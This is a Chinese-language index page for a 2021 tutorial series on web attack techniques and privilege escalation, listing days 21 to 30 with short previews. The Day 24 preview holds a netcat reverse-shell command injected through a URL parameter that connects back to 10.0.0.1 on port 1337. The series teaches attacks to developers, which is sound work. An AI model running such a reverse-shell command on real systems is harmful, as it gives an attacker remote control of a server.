iT邦幫忙

鐵人檔案

2021 iThome 鐵人賽
回列表
Security

讓Web開發者森77的Hacking Trick 系列

這個系列主要會介紹一些Web Application攻擊手法和一些Real World的案例以及Windows/Linux的Privilege Escalation。
但一些特別常被人提起的Web Attack如SQL Injection, XSS等等可能就不會在這次系列中出現,取而代之的會是像ORM Injection, HTTP Verb Tampering, HTTP Request Smuggling等等有趣的主題。

鐵人鍊成 | 共 30 篇文章 | 30 人訂閱 訂閱系列文 RSS系列文 團隊打醬油
DAY 21

[Day21] Remote Code Execution

前言 你知道Remote Code Execution很嚴重,但你知道有哪些可以觸發RCE嗎? 正文 概念 只要能夠Remote Code Execution,...

2021-10-06 ‧ 由 克雷格 分享
DAY 22

[Day22] Websocket Injection

前言 :Websocket除了能建立一個雙向通訊通道外,還能幹嘛? :當然是拿來Injection阿 正文 概念 Websocket允許客戶端或Server建立...

2021-10-07 ‧ 由 克雷格 分享
DAY 23

[Day23] Session fixation

前言 被Netflix fixation了,差點忘記發文 正文 概念 CWE-384 Authenticating a user, or otherwise...

2021-10-08 ‧ 由 克雷格 分享
DAY 24

[Day24] Bind Shell / Reverse Shell

前言 $nc -lvnp 1337 http://shhhhh.com/?cmd=nc%20-e%20/bin/sh%2010.0.0.1%201337 $id...

2021-10-09 ‧ 由 克雷格 分享
DAY 25

[Day25] JSON Injection

正文 概念 JSON 是一個以純文字為基礎去生成的簡單結構,可以很簡單的與其他應用程式交換資料、傳遞訊息。但若是讓未經驗證的input在應用程式中執行,就會引發...

2021-10-10 ‧ 由 克雷格 分享
DAY 26

[Day26] Business Logic Vulnerabilities - 商業邏輯漏洞

前言 前面介紹過很多各種各樣的web application攻擊手法,今天來介紹Business Logic中引發的問題 正文 Business Logic E...

2021-10-11 ‧ 由 克雷格 分享
DAY 27

[Day27 ] Chained Exploits - 鏈式漏洞利用(漏洞利用組合技)

前言 前面介紹了很多Web攻擊,今天來講講組合技吧 正文 在真實世界(real-world)的惡意攻擊中,攻擊者只依靠單一的漏洞進行利用反而不常見,常常是組合各...

2021-10-12 ‧ 由 克雷格 分享
DAY 28

[Day28] Linux Privilege Escalation

前言 快要結束了,今明兩天會講點拿下Server Initial Access(foothold)之後的權限提升。 正文 在滲透測試期間,若是成功拿到Initi...

2021-10-13 ‧ 由 克雷格 分享
DAY 29

[Day29] Windows Privilege Escalation

前言 昨天的Linux PrivEsc中已經介紹過提權的基本概念了,所以今天就直接進入正題吧 正文 與Linux的提權一樣,有一些常見的Windows提權手段,...

2021-10-14 ‧ 由 克雷格 分享
DAY 30

[Day30] 讓Web開發者森77之後 / 總結

正文 今天最後一天了,當初因為沒存稿的關係,加上很多主題想寫,但又沒把握能寫好,所以不知道能不能順利完賽XD。 Web應用程式的攻擊其實還有很多,像是SSRF、...

2021-10-15 ‧ 由 克雷格 分享